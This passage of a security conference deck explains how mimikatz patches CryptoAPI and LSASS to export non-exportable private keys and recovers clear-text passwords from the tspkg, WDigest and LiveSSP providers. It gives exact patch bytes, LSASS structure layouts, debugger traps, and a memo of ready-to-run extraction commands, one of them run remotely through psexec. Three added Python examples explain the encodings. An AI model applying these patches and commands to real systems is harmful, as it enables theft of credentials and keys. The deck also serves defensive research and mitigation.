- Use a separate network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) $€
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
- Stop shared secrets for authentication, push public/private stuff (like keys ;))
- Take every opportunity to drop backward compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?

A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • even those which are "not" exportable
What the crypto module can do:
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public part, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  • CryptoAPI, in the mimikatz context
  • CNG, in the LSASS context (again!)

(source module: mod_mimikatz_crypto)
mimikatz crypto: how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • at least not without the master keys and/or passwords of the users
A computer/user can load its own keys because it has enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/usage can be limited by:
- Password
- Popup
- Export/Archive flag not present

[diagram] Password and popup: a constraint for most users, unavailable for computer keys. Export flag, set at import time:
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto: capi: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
- http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your app here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard readers, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto: capi: how it's exported (… level)

[flow diagram] Process -> CryptoAPI and RSA CSP (same process): "Ask to export key" -> "Load private key" (DPAPI decode) -> Exportable? yes: exported key; no: NTE_BAD_KEY_STATE. (Labelled "PLAYSKOOL" on the slide.)
mimikatz crypto: patchcapi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportCertificates
Location: 'CERT_SYSTEM_STORE_CURRENT_USER\My'
 - Benjamin Delpy
	Key container: 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider: Microsoft Enhanced Cryptographic Provider v1.0
	Type: AT_KEYEXCHANGE
	Exportable: NO
	Key size: 2048
	Private export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx': KO (0x8009000b) Key not valid for use in specified state.
	Public export in 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der': OK

The same key seen by certutil (translated):
================ Certificate 0 ================
Serial number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
This is not a root certificate
Cert hash (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
The private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz crypto: patchcapi: because I own my process

So what? A module in my own process tells me that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space (two bytes at each of the two sites below):

.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
becomes
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749  0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
becomes
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto: patchcapi: demo time

Import, export, import as not exportable… export!
mimikatz crypto: patchcapi: limitations

Because:
- I'm lazy
- In the majority of cases I've seen RSA keys in real-life use
  • Elliptic curve, a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto: cng: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
- http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
The process uses RPC to call the "Key Isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz crypto: cng: how it's exported (… level)

[flow diagram] Process -> CNG -> RPC -> KeyIso service (LSASS process): "Ask to export key" -> "Load private key" (DPAPI decode) -> Exportable? yes: exported key; no: NTE_NOT_SUPPORTED. (Labelled "PLAYSKOOL" on the slide.) On NT6, LSASS is a SYSTEM process protected by the mandatory label ML_SYSTEM (SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP).
mimikatz crypto: patchcng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable

mimikatz # crypto::exportKeys [user]
CNG keys:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportable: NO
	Key size: 2048
	Private export in 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk': KO - mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz crypto: patchcng: because sometimes I own LSASS

This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210  75 1C    jnz short continue_key_export
becomes
.text:6C815210  EB 1C    jmp short continue_key_export
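Why do the patchcapi and patchcng patches above never touch the displacement bytes? A near "jnz rel32" is 6 bytes and a near "jmp rel32" is 5, so a nop in front of the jmp keeps the next-instruction address (the base the displacement counts from) exactly where it was; the short "jnz rel8" to "jmp rel8" case is a single opcode byte. The following is an added example, not mimikatz code: it applies the same transformation to the three instruction sequences printed on the slides (addresses and bytes copied from there; standard x86 32-bit encoding) and checks that each target is unchanged and that the byte counts match the "4" bytes and "1" byte the slides claim.

```python
"""
Added example (not from mimikatz): turn the conditional export checks'
"jnz" into unconditional jumps the way the slides do, and verify that the
jump target is unchanged. Sites and bytes are those shown on the slides.
"""


def force_jump(code: bytes) -> bytes:
    """Rewrite a jnz at the start of code into an unconditional jump of the same length."""
    if code[:2] == b"\x0f\x85":           # jnz rel32 (6 bytes) -> nop ; jmp rel32 (1 + 5 bytes)
        return b"\x90\xe9" + bytes(code[2:6])
    if code[:1] == b"\x75":               # jnz rel8 (2 bytes) -> jmp rel8 (2 bytes)
        return b"\xeb" + bytes(code[1:2])
    raise ValueError("not a jnz at offset 0")


def jump_target(addr: int, code: bytes) -> int:
    """Absolute target of the jump at addr; x86 displacements count from the next instruction."""
    if code[:1] == b"\x90":               # step over the nop left behind by the patch
        return jump_target(addr + 1, code[1:])
    if code[:2] == b"\x0f\x85":
        return (addr + 6 + int.from_bytes(code[2:6], "little", signed=True)) & 0xFFFFFFFF
    if code[:1] == b"\xe9":
        return (addr + 5 + int.from_bytes(code[1:5], "little", signed=True)) & 0xFFFFFFFF
    if code[:1] in (b"\x75", b"\xeb"):
        return (addr + 2 + int.from_bytes(code[1:2], "little", signed=True)) & 0xFFFFFFFF
    raise ValueError("unsupported opcode")


def bytes_changed(before: bytes, after: bytes) -> int:
    """How many bytes a patch actually rewrote (what you would write with WriteProcessMemory)."""
    return sum(1 for a, b in zip(before, after) if a != b)


# the three patch sites from the slides: rsaenh.dll (patchcapi) and ncrypt inside LSASS (patchcng)
PATCH_SITES = {
    "rsaenh continue_key_export_or_archive":         (0x0AC0B7CB, bytes.fromhex("0f8533c7ffff")),
    "rsaenh continue_key_export_or_archive_prepare": (0x0AC1F749, bytes.fromhex("0f85b63bffff")),
    "ncrypt continue_key_export":                    (0x6C815210, bytes.fromhex("751c")),
}


def check_sites(sites=PATCH_SITES) -> dict:
    """For each site: target before the patch, target after it, and bytes rewritten."""
    result = {}
    for name, (addr, original) in sites.items():
        patched = force_jump(original)
        result[name] = (jump_target(addr, original), jump_target(addr, patched),
                        bytes_changed(original, patched))
    return result


if __name__ == "__main__":
    for name, (before, after, n) in check_sites().items():
        print(f"{name}: {before:#010x} -> {after:#010x}, {n} byte(s) changed")
```

The same check is worth running before applying any such patch to a live process: if the two targets differ, the bytes you are about to write do not encode the jump you think they do.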
mimikatz crypto: patchcng: demo time

Import, export, import as not exportable… export again!
mimikatz crypto: patchcng: limitations

The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz crypto: patchcng: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil

Before the patch (translated):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
The private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert hash (sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz crypto: memo

Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto: what can we do?

Exactly the same as for sekurlsa: what prevents access to accounts/computers
- no admin, no admin, no admin…
Basics
- Use smartcards/tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendor implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  - Play with tokens & privileges
  - Display SSDT x86 & x64
  - List minifilters actions
  - List notifications (process, thread, image, registry)
  - List object hooks and procedures
  - …
- …
mimikatz :: that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft, for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
…especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: how LSA works ( level)
Authentication packages
- take the user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get this data and inject it into another LSASS session, we skip the authentication part
This is the principle of « Pass-the-hash »
- In fact, of « Pass-the-x »
PLAYSKOOL
mimikatz :: sekurlsa :: history of « pass-the-x » 1/2
Pass-the-hash
- 1997 - Unix: modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French, so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa :: history of « pass-the-x » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases with Microsoft about it…
…Lots of time…
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again… more curious, but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without any injection at all (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes the hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduced an SSO capability for Terminal Server with NT 6 to improve the RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- The user does not have to type their password
- The password is not in the RDP file
- The password is not in the user's secrets
mimikatz :: sekurlsa :: tspkg :: questions
The KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? | Hash? | Ticket? It seems…
- In all cases, the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN)."
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge response for authentication?
  • Server: YES (TLS / Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory
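To make the point of the TSPasswordCreds structure concrete, here is an added example (my code, not from the deck or from mimikatz) that DER-encodes and decodes it. It assumes what the [MS-CSSP] module declares as I read it: explicit context tags [0]..[2] around the OCTET STRINGs, and UTF-16LE strings inside them; the sample domain, user and password values are constructed. The thing to see is that the password travels as plain bytes inside the structure, protected only by the TLS channel that wraps CredSSP, which is exactly why the client side has to hold the password itself.

```python
"""DER encoder/decoder for MS-CSSP TSPasswordCreds (added example, not the deck's code).

    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
Assumed: EXPLICIT context tags and UTF-16LE string contents.
"""

FIELD_NAMES = ("domainName", "userName", "password")


def der_length(n: int) -> bytes:
    """DER length: short form below 0x80, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_length(len(body)) + body


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    """Build the SEQUENCE; each field is [i] EXPLICIT wrapping an OCTET STRING."""
    fields = []
    for idx, value in enumerate((domain, user, password)):
        octet_string = der_tlv(0x04, value.encode("utf-16-le"))
        fields.append(der_tlv(0xA0 | idx, octet_string))  # context-specific, constructed
    return der_tlv(0x30, b"".join(fields))


def read_tlv(buf: bytes, pos: int):
    """Return (tag, body, next_pos) for the TLV starting at pos; raises on truncation."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated TLV body")
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(der: bytes) -> dict:
    """Parse the SEQUENCE back into {'domainName': ..., 'userName': ..., 'password': ...}."""
    tag, body, end = read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single SEQUENCE")
    out, pos = {}, 0
    while pos < len(body):
        tag, inner, pos = read_tlv(body, pos)
        idx = tag & 0x1F
        if (tag & 0xE0) != 0xA0 or idx > 2:
            raise ValueError("unexpected tag %#x" % tag)
        inner_tag, octets, _ = read_tlv(inner, 0)
        if inner_tag != 0x04:
            raise ValueError("expected OCTET STRING")
        out[FIELD_NAMES[idx]] = octets.decode("utf-16-le")
    return out


def password_is_visible(der: bytes, password: str) -> bool:
    """True when the raw UTF-16LE password bytes sit verbatim inside the encoding."""
    return password.encode("utf-16-le") in der


if __name__ == "__main__":
    # Constructed sample values.
    blob = encode_ts_password_creds("CORP", "alice", "Sup3r-Secret")
    print(blob.hex())
    print(decode_ts_password_creds(blob), password_is_visible(blob, "Sup3r-Secret"))
```

Running the block prints the hex encoding, the round-tripped fields and True for the visibility check; a defender reviewing a CredSSP deployment should read that last value as the reason delegation must only ever be enabled towards servers that are trusted with the user's actual password.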
mimikatz :: sekurlsa :: tspkg :: symbols & theory
Let's explore some symbols
- sounds cool… (thanks Microsoft)
Let's imagine a scenario
- Enumerate all sessions to obtain:
  • Username
  • Domain
  • LUID
- Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain:
  • TS_CREDENTIAL
- Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for:
  • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg :: workflow
[workflow diagram] LsaEnumerateLogonSessions -> for each LUID -> tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) -> KIWI_TS_CREDENTIAL -> KIWI_TS_PRIMARY_CREDENTIAL (LsaUnprotectMemory) -> password in clear

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]" Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios
- Authenticated client access to a Web site
- Authenticated client access using SASL
- Authenticated client access with integrity protection to a directory service using LDAP" Microsoft: http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but which hashes?
H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon
The WDigest provider must have the elements to compute responses for different servers:
- Username
- Realm (from the server)
- Password
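The HA1 / HA2 / response chain above, carried through in code as an added example (mine, not the deck's or mimikatz's). It implements the RFC 2617 qop=auth form and checks itself against the RFC's own worked vector (user "Mufasa", realm "testrealm@host.com", password "Circle Of Life"); the realm-change check at the end uses constructed values. What it shows is the slide's point from the defender's side: the server only needs to store HA1 for its own realm, but a client that must answer challenges from realms it cannot know in advance has to keep either the password or one HA1 per realm, and Windows's WDigest chose the password.

```python
"""RFC 2617 Digest computation (added example, not from the slides)."""
import hashlib
import hmac


def _md5_hex(text: str) -> str:
    """Hex MD5 of a string; Digest as defined in RFC 2617 is built on MD5."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is chosen by the server."""
    return _md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI), the qop=auth variant."""
    return _md5_hex(f"{method}:{digest_uri}")


def response(ha1_hex: str, nonce: str, nc: str, cnonce: str, method: str, uri: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2) with qop=auth (RFC 2617 3.2.2.1)."""
    return _md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:auth:{ha2(method, uri)}")


def client_answer(username, password, challenge_realm, nonce, nc, cnonce, method, uri) -> str:
    """Client side: HA1 is (re)computed for whatever realm the challenge names.

    That is only possible with the password in hand (WDigest's choice) or with
    an HA1 precomputed for that exact realm.
    """
    return response(ha1(username, challenge_realm, password), nonce, nc, cnonce, method, uri)


def server_verify(stored_ha1, nonce, nc, cnonce, method, uri, presented) -> bool:
    """Server side: only HA1 for its own realm is stored, never the password."""
    expected = response(stored_ha1, nonce, nc, cnonce, method, uri)
    return hmac.compare_digest(expected, presented)


def precomputed_ha1_fails_on_new_realm(username, password, known_realm, new_realm) -> bool:
    """True when an HA1 precomputed for known_realm cannot answer a challenge
    from new_realm, i.e. the client needs the password (or another HA1)."""
    nonce, nc, cnonce, method, uri = "n0nce", "00000001", "cn0nce", "GET", "/"  # constructed
    answer_with_old_ha1 = response(ha1(username, known_realm, password), nonce, nc, cnonce, method, uri)
    server_ha1_for_new_realm = ha1(username, new_realm, password)
    return not server_verify(server_ha1_for_new_realm, nonce, nc, cnonce, method, uri, answer_with_old_ha1)


if __name__ == "__main__":
    # RFC 2617 section 3.5 vector.
    print(client_answer("Mufasa", "Circle Of Life", "testrealm@host.com",
                        "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b",
                        "GET", "/dir/index.html"))
    print(precomputed_ha1_fails_on_new_realm("alice", "pw", "realmA", "realmB"))
```

The first print is the RFC's published response value; the second is True, which is the whole reason a client-side Digest provider that wants SSO across unknown realms ends up storing the password.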
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
- that WDigest keeps the password in memory « by protocol », for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- SpAcceptCredentials takes the clear password in its arguments
  • Protects it with LsaProtectMemory
  • Updates or inserts the data in the doubly linked list wdigest!l_LogSessList

.text:7409D151  _DigestCalcHA1@8         call dword ptr [eax+0B4h]
.text:74096C69  _SpAcceptCredentials@16  call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[workflow diagram] LsaEnumerateLogonSessions -> for each LUID -> wdigest!l_LogSessList (search the linked list for the LUID) -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    /* […] */
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search for passwords…
- Protocol reading
- Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDBG trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's login with a Live account on Windows 8
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert the data in LiveGlobalLogonSessionList (similar to WDigest)

Call stacks printed by the trap:
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
<- Our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah! Pass the Hash capability with a Live account too…
A Live user can logon through RDP via SSO
mimikatz :: sekurlsa :: livessp :: workflow
[workflow diagram] LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList (search the linked list for the LUID) -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
